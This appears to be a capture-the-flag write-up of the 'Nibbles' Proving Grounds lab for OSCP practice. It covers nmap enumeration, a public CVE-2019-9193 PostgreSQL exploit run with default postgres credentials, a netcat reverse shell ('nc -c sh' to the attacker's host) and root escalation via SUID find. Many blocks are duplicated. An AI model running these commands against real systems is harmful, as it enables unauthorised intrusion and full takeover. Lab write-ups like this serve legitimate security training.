June 13, 2026
Nibbles | Proving Grounds | OSCP Preparation
Start off with a nmap scan of the target:
SilentExploit
5 min read
┌──(root㉿user)-[/run/…/user/2024/HTBox/nibbles]
└─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script vuln
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-13 01:23 BST
Initiating Parallel DNS resolution of 1 host. at 01:23
Completed Parallel DNS resolution of 1 host. at 01:23, 0.02s elapsed
Initiating SYN Stealth Scan at 01:23
Scanning 192.168.181.47 [65535 ports]
Discovered open port 22/tcp on 192.168.181.47
Discovered open port 80/tcp on 192.168.181.47
Discovered open port 21/tcp on 192.168.181.47
Discovered open port 5437/tcp on 192.168.181.47
SYN Stealth Scan Timing: About 48.70% done; ETC: 01:24 (0:00:33 remaining)
Completed SYN Stealth Scan at 01:24, 59.02s elapsed (65535 total ports)
Nmap scan report for 192.168.181.47
Host is up (0.026s latency).
Not shown: 65529 filtered tcp ports (no-response), 2 closed tcp ports (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
5437/tcp open pmip6-data
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 59.14 seconds
Raw packets sent: 131110 (5.769MB) | Rcvd: 93481 (22.510MB)
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-13 01:24 BST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 01:24
Completed NSE at 01:24, 0.00s elapsed
Initiating NSE at 01:24
Completed NSE at 01:24, 0.00s elapsed
Initiating NSE at 01:24
Completed NSE at 01:24, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 01:24
Completed Parallel DNS resolution of 1 host. at 01:24, 0.01s elapsed
Initiating SYN Stealth Scan at 01:24
Scanning 192.168.181.47 [1000 ports]
Discovered open port 80/tcp on 192.168.181.47
Discovered open port 21/tcp on 192.168.181.47
Discovered open port 22/tcp on 192.168.181.47
Completed SYN Stealth Scan at 01:24, 8.50s elapsed (1000 total ports)
Initiating Service scan at 01:24
Scanning 3 services on 192.168.181.47
Completed Service scan at 01:24, 6.09s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.181.47.
Initiating NSE at 01:24
Completed NSE at 01:24, 5.13s elapsed
Initiating NSE at 01:24
Completed NSE at 01:24, 0.21s elapsed
Initiating NSE at 01:24
Completed NSE at 01:24, 0.00s elapsed
Nmap scan report for 192.168.181.47
Host is up (0.025s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 10:62:1f:f5:22:de:29:d4:24:96:a7:66:c3:64:b7:10 (RSA)
| 256 c9:15:ff:cd:f3:97:ec:39:13:16:48:38:c5:58:d7:5f (ECDSA)
|_ 256 90:7c:a3:44:73:b4:b4:4c:e3:9c:71:d1:87:ba:ca:7b (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Enter a title, displayed at the top of the window.
139/tcp closed netbios-ssn
445/tcp closed microsoft-ds
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
<SNIP>┌──(root㉿user)-[/run/…/user/2024/HTBox/nibbles]
└─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script vuln
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-13 01:23 BST
Initiating Parallel DNS resolution of 1 host. at 01:23
Completed Parallel DNS resolution of 1 host. at 01:23, 0.02s elapsed
Initiating SYN Stealth Scan at 01:23
Scanning 192.168.181.47 [65535 ports]
Discovered open port 22/tcp on 192.168.181.47
Discovered open port 80/tcp on 192.168.181.47
Discovered open port 21/tcp on 192.168.181.47
Discovered open port 5437/tcp on 192.168.181.47
SYN Stealth Scan Timing: About 48.70% done; ETC: 01:24 (0:00:33 remaining)
Completed SYN Stealth Scan at 01:24, 59.02s elapsed (65535 total ports)
Nmap scan report for 192.168.181.47
Host is up (0.026s latency).
Not shown: 65529 filtered tcp ports (no-response), 2 closed tcp ports (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
5437/tcp open pmip6-data
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 59.14 seconds
Raw packets sent: 131110 (5.769MB) | Rcvd: 93481 (22.510MB)
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-13 01:24 BST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 01:24
Completed NSE at 01:24, 0.00s elapsed
Initiating NSE at 01:24
Completed NSE at 01:24, 0.00s elapsed
Initiating NSE at 01:24
Completed NSE at 01:24, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 01:24
Completed Parallel DNS resolution of 1 host. at 01:24, 0.01s elapsed
Initiating SYN Stealth Scan at 01:24
Scanning 192.168.181.47 [1000 ports]
Discovered open port 80/tcp on 192.168.181.47
Discovered open port 21/tcp on 192.168.181.47
Discovered open port 22/tcp on 192.168.181.47
Completed SYN Stealth Scan at 01:24, 8.50s elapsed (1000 total ports)
Initiating Service scan at 01:24
Scanning 3 services on 192.168.181.47
Completed Service scan at 01:24, 6.09s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.181.47.
Initiating NSE at 01:24
Completed NSE at 01:24, 5.13s elapsed
Initiating NSE at 01:24
Completed NSE at 01:24, 0.21s elapsed
Initiating NSE at 01:24
Completed NSE at 01:24, 0.00s elapsed
Nmap scan report for 192.168.181.47
Host is up (0.025s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 10:62:1f:f5:22:de:29:d4:24:96:a7:66:c3:64:b7:10 (RSA)
| 256 c9:15:ff:cd:f3:97:ec:39:13:16:48:38:c5:58:d7:5f (ECDSA)
|_ 256 90:7c:a3:44:73:b4:b4:4c:e3:9c:71:d1:87:ba:ca:7b (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Enter a title, displayed at the top of the window.
139/tcp closed netbios-ssn
445/tcp closed microsoft-ds
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
<SNIP>My nmap syntax came through on this box once. It gave accurate picture of ALL ports showing as open on the target. I usually pay particular attention to the results from the first scan because this will show open ports that need more probing to determine the service available.
Here is a quick breakdown of my notes on the services that I went through before getting to port 5437 (entry vector).
Port 21 - FTP
- brute forcing attempted but unfortunately this fails
Port 139,445 - SMB
- no null or guest sessions available
Port 80
- fuzzing leads no wherePort 21 - FTP
- brute forcing attempted but unfortunately this fails
Port 139,445 - SMB
- no null or guest sessions available
Port 80
- fuzzing leads no wherePort 5437
What service do we have running on this port ?
┌──(root㉿user)-[/run/…/user/2024/HTBox/nibbles]
└─# nmap -sVC $target -p 5437
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-12 23:15 BST
Nmap scan report for 192.168.181.47
Host is up (0.024s latency).
PORT STATE SERVICE VERSION
5437/tcp open postgresql PostgreSQL DB 11.3 - 11.9
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Not valid before: 2020-04-27T15:41:47
|_Not valid after: 2030-04-25T15:41:47
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.77 seconds┌──(root㉿user)-[/run/…/user/2024/HTBox/nibbles]
└─# nmap -sVC $target -p 5437
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-12 23:15 BST
Nmap scan report for 192.168.181.47
Host is up (0.024s latency).
PORT STATE SERVICE VERSION
5437/tcp open postgresql PostgreSQL DB 11.3 - 11.9
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Not valid before: 2020-04-27T15:41:47
|_Not valid after: 2030-04-25T15:41:47
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.77 secondsThis confirmed that we had PostGreSQL 11.3–11.9; I attempted various brute forcing attacks from hackviser. Research uncovered that the database by default has a super user and an administrative user called postgres.
Unfortunately for me; none of the brute forcing syntax worked. I am pretty sure that I had a 'correct' pairing but unfortunately, it didn't show anywhere in my results.
Whilst checking for known public exploits in the services running on the target I came across CVE-2019–9193 — link
A quick analysis of the code confirms that it will use the 'default' username and password. This is something I would have likely tried but definitely cost me lots of time when going through the machine as I was struggling for an entry point for quite a while.
parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to use to connect to the PostgreSQL DB [Default: postgres]')
parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to use to connect to the the PostgreSQL DB [Default: postgres]') parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to use to connect to the PostgreSQL DB [Default: postgres]')
parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to use to connect to the the PostgreSQL DB [Default: postgres]')Basically, the exploit allows an authenticated user to execute arbitrary operating system commands with the privileges of the database server. It achieves this by misusing the legitimate COPY ... FROM PROGRAM SQL command to run a system command and pipe the output directly into a temporary database table.
┌──(root㉿user)-[/run/…/user/2024/HTBox/nibbles]
└─# python3 exp.py -i $target -p 5437 -U postgres -P postgres -c whoami
[+] Connecting to PostgreSQL Database on 192.168.181.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _a6b40979934439ef731b6a8052be1158
[+] Command executed
postgres
[+] Deleting table _a6b40979934439ef731b6a8052be1158┌──(root㉿user)-[/run/…/user/2024/HTBox/nibbles]
└─# python3 exp.py -i $target -p 5437 -U postgres -P postgres -c whoami
[+] Connecting to PostgreSQL Database on 192.168.181.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _a6b40979934439ef731b6a8052be1158
[+] Command executed
postgres
[+] Deleting table _a6b40979934439ef731b6a8052be1158With successful code execution confirmed on the target I then moved to obtaining a reverse shell. The usual n00b port for my reverse connection (4444) failed; whenever this happens I just switch port to a more common one i.e. 80, 443 etc.
┌──(root㉿user)-[/run/…/user/2024/HTBox/nibbles]
└─# python3 exp.py -i $target -p 5437 -U postgres -P postgres -c 'nc -c sh 192.168.45.180 80'
[+] Connecting to PostgreSQL Database on 192.168.181.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _a2c5d9eec8b288b0590b9c9847d98c40┌──(root㉿user)-[/run/…/user/2024/HTBox/nibbles]
└─# python3 exp.py -i $target -p 5437 -U postgres -P postgres -c 'nc -c sh 192.168.45.180 80'
[+] Connecting to PostgreSQL Database on 192.168.181.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _a2c5d9eec8b288b0590b9c9847d98c40Shell obtained as postgres
┌──(venv)─(root㉿user)-[/home/user/Downloads]
└─# rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.180] from (UNKNOWN) [192.168.181.47] 39082
id
uid=106(postgres) gid=113(postgres) groups=113(postgres),112(ssl-cert)┌──(venv)─(root㉿user)-[/home/user/Downloads]
└─# rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.180] from (UNKNOWN) [192.168.181.47] 39082
id
uid=106(postgres) gid=113(postgres) groups=113(postgres),112(ssl-cert)Lateral movement
I checked what users had shells on the system and confirmed that we have Wilson and Root.
After sometime trying to pillage some credentials for Wilson (perusing his home directory and the web directory; I ran linpeas on the target to see if I could nab a quick win.
The SUID section of linpeas confirmed that /usr/bin/find runs with the setuid bit set.
I headed over to GTFO bins and grabbed the SUID syntax for spawning a root shell.
This command leverages the find utility to execute a shell (/bin/sh) with the -p flag, which preserves the root privileges inherently available if find has the SUID bit set or is run via sudo. As a result, the user successfully drops into a root shell, as demonstrated by the effective user ID (euid=0(root)) in the output below.
postgres@nibbles:/tmp$ find . -exec /bin/sh -p \; -quit
find . -exec /bin/sh -p \; -quit
# id
id
uid=106(postgres) gid=113(postgres) euid=0(root) groups=113(postgres),112(ssl-cert)postgres@nibbles:/tmp$ find . -exec /bin/sh -p \; -quit
find . -exec /bin/sh -p \; -quit
# id
id
uid=106(postgres) gid=113(postgres) euid=0(root) groups=113(postgres),112(ssl-cert)